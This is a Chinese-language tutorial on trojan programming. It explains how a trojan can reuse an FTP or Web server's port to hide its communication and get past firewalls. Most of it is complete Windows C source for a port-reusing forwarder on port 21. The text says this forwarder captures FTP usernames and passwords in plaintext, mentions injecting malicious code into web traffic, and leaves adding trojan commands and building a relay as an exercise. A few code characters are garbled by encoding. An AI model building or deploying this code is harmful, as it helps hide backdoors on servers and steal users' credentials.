木馬的服務(wù)端與客戶端通信必將產(chǎn)生活動端口,產(chǎn)生活動端口就很容易被發(fā)現(xiàn),那么應(yīng)該如何隱藏端口呢?
1. 端口復(fù)用的原理
端口復(fù)用就是某個已經(jīng)被其他服務(wù)綁定過的端口再次被綁定而進行重復(fù)使用。端口復(fù)用對于木馬程序來說有兩個好處。第一個好處是隱藏端口,比如某臺主機上搭建了FTP服務(wù)器,這樣默認情況下就開啟了21號端口,通過端口復(fù)用就可以直接使用21號端口完成木馬的通信,在進行檢測時就不會發(fā)現(xiàn)有多余的端口被打開;第二個好處是不會被防火墻阻攔,因為端口復(fù)用FTP服務(wù)端口或Web服務(wù)端口這些已知和合法的端口,這些端口在服務(wù)器上是正常使用的端口,那么管理員當然會允許這些正常服務(wù)的通信連接。
木馬使用端口復(fù)用技術(shù)后,由于木馬和被復(fù)用服務(wù)使用同一個端口(比如木馬復(fù)用了FTP的21號端口),當數(shù)據(jù)包到達時,系統(tǒng)根據(jù)指定IP地址較詳細的原則就傳遞給誰。指定IP地址時的代碼如下:
sockaddr_in saddr;
saddr.sin_addr.S_un.S_addr = INADDR_ANY;
在代碼中對地址的賦值使用了INADDR_ANY,表示任意的本機IP地址都可以。這樣指定的地址不是最明確的。通常提供服務(wù)的Web服務(wù)器或FTP服務(wù)器都有類似的設(shè)置。那么在編寫使用端口復(fù)用技術(shù)的木馬時,就要明確指定用戶所使用的一個IP地址。無論用戶是擁有內(nèi)網(wǎng)的IP地址,還是有外網(wǎng)的IP地址,都擁有一個回環(huán)地址,即127.0.0.1。在設(shè)置重復(fù)綁定的端口時,可以設(shè)置為除127.0.0.1之外的任意具體IP地址。比如,可以設(shè)定一個“10.10.30.77”IP地址。而127.0.0.1這個回環(huán)地址是木馬與提供服務(wù)的服務(wù)器軟件進行通信的。示意圖如圖1所示。
圖1 端口服務(wù)用木馬通信示意圖
從圖1中可以看出,無論是防火墻外部還是防火墻內(nèi)容,木馬都是可以正常通信的。復(fù)用了FTP服務(wù)器端口的木馬會收到所有發(fā)給FTP服務(wù)器的數(shù)據(jù),那么木馬在中間充當一個數(shù)據(jù)中轉(zhuǎn)的作用,把原本發(fā)給FTP服務(wù)器的數(shù)據(jù)還是轉(zhuǎn)發(fā)給FTP服務(wù)器。如何區(qū)分是發(fā)給FTP服務(wù)器的數(shù)據(jù),還是發(fā)給木馬的數(shù)據(jù)?凡是發(fā)給木馬的數(shù)據(jù)都是有固定的數(shù)據(jù)頭部的,以此可以判斷哪些數(shù)據(jù)轉(zhuǎn)發(fā)、哪些數(shù)據(jù)自己進行處理。由于木馬所處的通信位置,很容易截取到發(fā)送給FTP服務(wù)器的數(shù)據(jù),也很容易篡改FTP服務(wù)器發(fā)送給客戶端的數(shù)據(jù)。這點是很可怕、很危險的。同樣,如果復(fù)用的是Web服務(wù)器的端口,那么就可以在不修改Web頁面的情況下,直接發(fā)送給瀏覽器一些惡意代碼,從而對用戶進行攻擊。
2. 端口復(fù)用的代碼實現(xiàn)
下面來看源代碼的實現(xiàn)。
#include <stdio.h>
#include <winsock2.h>
#pragma comment (lib, “ws2_32”)
DWORD WINAPI ClientThread(LPVOID lpParam);
int main()
{
WSADATA wsa;
SOCKET s;
BOOL bVal;
SOCKET sc;
int nAddrSize;
sockaddr_in ClientAddr;
// 初始化 SOCK 庫
WSAStartup(MAKEWORD(2, 2), &wsa);
// 建立套接字
s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
bVal = TRUE;
// 設(shè)置套接字為復(fù)用模式
if ( setsockopt(s, SOL_SOCKET, SO_REUSEADDR, (char *)&bVal, sizeof(bVal)) != 0 )
{
printf(“error! \r\n”);
return -1;
}
sockaddr_in sListen;
sListen.sin_family = AF_INET;
// 這里的 IP 地址必須明確指定一個地址
sListen.sin_addr.S_un.S_addr = inet_addr(“192.168.1.102”);
sListen.sin_port = htons(21);
// 綁定 21 號端口
if ( bind(s, (SOCKADDR*)&sListen, sizeof(SOCKADDR)) == SOCKET_ERROR )
{
printf(“%d\r\n”, GetLastError());
printf(“error bind! \r\n”);
return -1;
}
// 監(jiān)聽套接字
listen(s, 1);
// 循環(huán)接受來自 FTP 客戶端或木馬的請求
while ( TRUE )
{
HANDLE hThread;
nAddrSize = sizeof(SOCKADDR);
// 接受請求
sc = accept(s, (SOCKADDR*)&ClientAddr, &nAddrSize);
if ( sc != INVALID_SOCKET )
{
// 創(chuàng)建新線程進行處理
hThread = CreateThread(NULL, 0, ClientThread, (LPVOID)sc, 0, NULL);
CloseHandle(hThread);
}
}
closesocket(s);
WSACleanup();
return 0;
}
DWORD WINAPI ClientThread(LPVOID lpParam)
{
// 保存與 FTP 客戶端通信的 SOCKET
SOCKET sc = (SOCKET)lpParam;
// 建立與 FTP 服務(wù)器端通信的 SOCKET
SOCKET sFtp;
sockaddr_in saddr;
DWORD dwTimeOut;
DWORD dwNum;
BYTE bBuffer[0x1000] = { 0 };
sFtp = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
saddr.sin_family = AF_INET;
saddr.sin_addr.S_un.S_addr = inet_addr(“127.0.0.1”);
saddr.sin_port = htons(21);
// 設(shè)置超時
dwTimeOut = 100;
setsockopt(sc, SOL_SOCKET, SO_RCVTIMEO,
?。╟har *)&dwTimeOut, sizeof(dwTimeOut));
setsockopt(sFtp, SOL_SOCKET, SO_RCVTIMEO,
?。╟har *)&dwTimeOut, sizeof(dwTimeOut));
// 連接 FTP 服務(wù)器
connect(sFtp, (SOCKADDR*)&saddr, sizeof(SOCKADDR));
// 循環(huán)接受客戶端與服務(wù)器的通信數(shù)據(jù)
while ( TRUE )
{
// 接收客戶端的數(shù)據(jù)
dwNum = recv(sc, (char *)bBuffer, 0x1000, 0);
if ( dwNum > 0 && dwNum != SOCKET_ERROR )
{
bBuffer[dwNum] = '\0';
printf(“%s \r\n”, bBuffer);
// 轉(zhuǎn)發(fā)給 FTP 服務(wù)器端
send(sFtp, (char *)bBuffer, dwNum, 0);
}
else if ( dwNum == 0 )
{
break;
}
ZeroMemory(bBuffer, 0x1000);
// 接收 FTP 服務(wù)器端的數(shù)據(jù)
dwNum = recv(sFtp, (char *)bBuffer, 0x1000, 0);
if ( dwNum > 0 && dwNum != SOCKET_ERROR )
{
bBuffer[dwNum] = '\0';
printf(“%s \r\n”, bBuffer);
// 轉(zhuǎn)發(fā)給客戶端
send(sc, (char *)bBuffer, dwNum, 0);
}
else if ( dwNum == 0 )
{
break;
}
ZeroMemory(bBuffer, 0x1000);
}
closesocket(sc);
closesocket(sFtp);
return 0;
}
這里的代碼中只是實現(xiàn)了一個端口復(fù)用的轉(zhuǎn)發(fā)功能,并沒有提供木馬的相應(yīng)功能。如果加入木馬的功能,就要在木馬收到數(shù)據(jù)后先判斷是控制端發(fā)送的木馬命令,還是應(yīng)該轉(zhuǎn)發(fā)的數(shù)據(jù),從而進行相應(yīng)的處理。木馬在轉(zhuǎn)發(fā)數(shù)據(jù)的過程中獲取了FTP數(shù)據(jù),如圖2所示。
圖2 木馬轉(zhuǎn)發(fā)數(shù)據(jù)
編譯連接自己的代碼,然后先啟動FTP服務(wù)器,再啟動連接好的木馬,通過命令行下連接FTP服務(wù)器。在木馬轉(zhuǎn)發(fā)的過程中得到了登錄FTP服務(wù)器的賬號和密碼(FTP對于賬號和密碼的傳輸都是明文進行的)。以此來看,木馬在轉(zhuǎn)發(fā)數(shù)據(jù)包的過程中也成了針對某服務(wù)的嗅探工具。
如法炮制,通過簡單修改上面的代碼則可以改成一個跳板程序。具體實現(xiàn)方式與此類似,就不再進行闡述。作為延展性的內(nèi)容,請大家自行完成。